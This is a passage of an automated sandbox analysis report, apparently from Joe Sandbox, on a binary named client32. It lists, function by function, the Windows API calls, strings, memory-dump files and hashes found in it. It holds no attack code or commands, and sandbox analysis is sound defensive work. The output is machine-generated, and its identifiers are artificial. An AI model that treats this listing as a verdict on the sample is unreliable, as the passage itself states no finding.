                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141FE
                                                                                                                              • m_hWnd, xrefs: 11014203
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                                                                              • Instruction ID: 032d4df9316a5e8283d8688c6328372b319042290bc349747f778d43e7cc2059
                                                                                                                              • Opcode Fuzzy Hash: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                                                                              • Instruction Fuzzy Hash: B3E02B75B903287BD3209A81DC46FD7F39CDB04B55F004035F625AA581E6B1F450C794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,00001202,?,00000000), ref: 1101429F
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101427E
                                                                                                                              • m_hWnd, xrefs: 11014283
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                                                                              • Instruction ID: 7bc1a9946e64f754710be5ebc9e77f2b7f227168eeca9689bda6582359b448ca
                                                                                                                              • Opcode Fuzzy Hash: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                                                                              • Instruction Fuzzy Hash: 30E0C275A50328BBD2209691DC46FD6F39C9B04755F008036F625AA181D6B0B8408694
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11016170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 11016198
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hImageList, xrefs: 11016182
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 1101617D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitIconImageLastList_MessageProcessReplacewsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                                                                              • API String ID: 2426217062-4007669474
                                                                                                                              • Opcode ID: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                                                                              • Instruction ID: 8e65b7ad63f8a8bd737c5e548218eb9c2c83e8f30b1cb0f0ee6871e24481aec6
                                                                                                                              • Opcode Fuzzy Hash: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                                                                              • Instruction Fuzzy Hash: B8D02B756402297BC3108A88DC01FD5F38CCF15371F040336F961522C0D9B0A4408B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 11001136
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 1604732272-2830328467
                                                                                                                              • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                              • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                                                              • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                                                              • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hWnd, xrefs: 11001016
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2229609774-2830328467
                                                                                                                              • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                              • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                                              • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                              • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                                              • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoadVersion
                                                                                                                              • String ID: AudioCapture.dll
                                                                                                                              • API String ID: 3209957514-2642820777
                                                                                                                              • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                              • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                                              • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                              • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11014170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(00000000,00001200,00000000,00000000), ref: 1101419A
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101417B
                                                                                                                              • m_hWnd, xrefs: 11014180
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                              • API String ID: 819365019-3507600817
                                                                                                                              • Opcode ID: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                                                                              • Instruction ID: 2522c449d059071d808e86b76c7b4b43721457dd443dfec71d59ac38f3b9efb9
                                                                                                                              • Opcode Fuzzy Hash: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                                                                              • Instruction Fuzzy Hash: A0D0A735F9033576E6205591AC4BFC5B2985B04B49F104165F121B90C1D2A0B4408648
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindWindowA.USER32 ref: 1111316A
                                                                                                                              • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FindMessageSendWindow
                                                                                                                              • String ID: MSOfficeWClass
                                                                                                                              • API String ID: 1741975844-970895155
                                                                                                                              • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                              • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                                              • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                              • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                              • API String ID: 1417657345-2201682149
                                                                                                                              • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                              • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                                              • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                              • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110161B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ImageList_GetImageCount.COMCTL32 ref: 110161CF
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              • m_hImageList, xrefs: 110161BF
                                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 110161BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
